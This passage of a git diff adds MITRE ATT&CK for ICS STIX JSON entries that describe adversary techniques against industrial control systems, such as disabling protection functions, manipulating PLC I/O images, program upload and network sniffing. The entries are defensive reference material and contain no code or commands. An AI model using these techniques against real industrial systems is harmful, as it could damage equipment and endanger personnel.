PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 
2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163.json new file mode 100644 index 0000000000000000000000000000000000000000..6f816145296e3358ea9e12dd610d0713213663ec --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--1d8f2f9a-6595-4726-99c0-b870074e9ea2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Protection", + "description": "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel. \n\nMany faults and abnormal conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable protective system functions as a prerequisite to subsequent attack execution or to allow for future faults and abnormal conditions to go unchecked. Detection of a Loss of Protection by operators can result in the shutdown of a process due to strict policies regarding protection systems. 
This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0837", + "external_id": "T0837" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b.json new file mode 100644 index 0000000000000000000000000000000000000000..f4c82eebfc08796b3fa13a6399f7de0321d2e453 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--d2ae8df0-e6b3-478c-8fb2-f1ce78bc6697", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Monitor Process State", + "description": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0801", + "external_id": "T0801" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958.json new file mode 100644 index 0000000000000000000000000000000000000000..d89f0277254e604d4ad120c0b703bd7564a5f803 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--efe8aaea-4832-4d06-b988-5040f3497c3d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Scripting", + "description": "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. \n\nIn addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. 
Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Module: Module Load", + "Process: Process Creation", + "Process: Process Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0853", + "external_id": "T0853" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9.json new file mode 100644 index 0000000000000000000000000000000000000000..505ac945c3d0045be62bdb8297dfcc202fbf56f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--6eb77e7b-d8d4-4e91-9dfb-0206a378e19b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-17T15:14:31.276Z", + "name": "Remote System Information Discovery", + "description": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. \n\nRequests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. 
An adversary may leverage this same information by issuing calls directly to the system's API.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Access", + "Network Traffic: Network Traffic Content", + "Process: Process Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0888", + "external_id": "T0888" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3.json new file mode 100644 index 0000000000000000000000000000000000000000..6fb65632423f35e233690d9c642c8f27901640ba --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--7fff60d2-1494-45a4-b6d4-41f4752a1a0f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Program Upload", + "description": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0845", + "external_id": "T0845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00.json new file mode 100644 index 0000000000000000000000000000000000000000..6cd63d0d04cedc398244eb39ea4d80e6e8b1e225 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--e9af4f20-7498-4494-9a89-254cdacd2e87", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility.\n\nAn adversary may seek to target public-facing applications as they may provide direct access into an ICS environment or the ability to move into the ICS network. Publicly exposed applications may be found through online tools that scan the internet for open ports and services. Version numbers for the exposed application may provide adversaries an ability to target specific known vulnerabilities. 
Exposed control protocol or remote access ports found in Commonly Used Port may be of interest by adversaries.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0819", + "external_id": "T0819" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f.json new file mode 100644 index 0000000000000000000000000000000000000000..0dc9a598ec04642b6309842da58187f70a6a70bb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--bd059675-85da-44b7-9626-4cd8b56df0c2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T19:09:43.744Z", + "name": "Data from Information Repositories", + "description": "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)\n\nInformation collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.\n\nIn a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. 
(Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Data Historian" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Network Share: Network Share Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0811", + "external_id": "T0811" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9.json new file mode 100644 index 0000000000000000000000000000000000000000..4204b55b253649a7170543545f48a5e49107afaf --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--cd203f45-ac36-46e5-ad78-cca9738aa832", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:19:41.272Z", + "name": "Transient Cyber Asset", + "description": "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. \n\nAdversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. \n\nTransient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "created": "2021-10-14T15:25:32.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0864", + "external_id": "T0864" + }, + { + "source_name": "North American Electric Reliability Corporation June 2021", + "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", + "url": "https://www.nerc.com/files/glossary_of_terms.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004.json new file mode 100644 index 0000000000000000000000000000000000000000..ca93333c5278f15281e6a21d11a85dd44117f207 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--3e560487-f16a-48a7-ae9f-13b293971547", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:46:11.459Z", + "name": "Manipulate I/O Image", + "description": "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. 
\n\nOne of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0835", + "external_id": "T0835" + }, + { + "source_name": "Dr. Kelvin T. Erickson December 2010", + "description": "Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 ", + "url": "https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c.json new file mode 100644 index 0000000000000000000000000000000000000000..401bb9e3b2b82ab1939375e0b3d4989fdf030076 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--50835840-9f10-4567-bfd4-7d3ff7b0cdce", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Network Sniffing", + "description": "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information. \n\nAn adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. \n\nIn addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0842", + "external_id": "T0842" + }, + { 
+ "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Network Sniffing Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9.json new file mode 100644 index 0000000000000000000000000000000000000000..1bd102d4fb30f9b2ad6ad98f02d96ecd28ec8b08 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--9d54ffc4-b169-424b-9f29-518fa793576b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Rootkit", + "description": "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018) \n\nFirmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for the I/O that is attached to an asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. 
By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable [Impact](https://attack.mitre.org/tactics/TA0105).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "id": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0851", + "external_id": "T0851" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Rootkit Retrieved. 2018/05/16 ", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3de230d4-3e42-4041-b089-17e1128feded.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3de230d4-3e42-4041-b089-17e1128feded.json new file mode 100644 index 0000000000000000000000000000000000000000..55e3c06cc7132db88b985a86f6a6902be6e3676d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--3de230d4-3e42-4041-b089-17e1128feded.json 
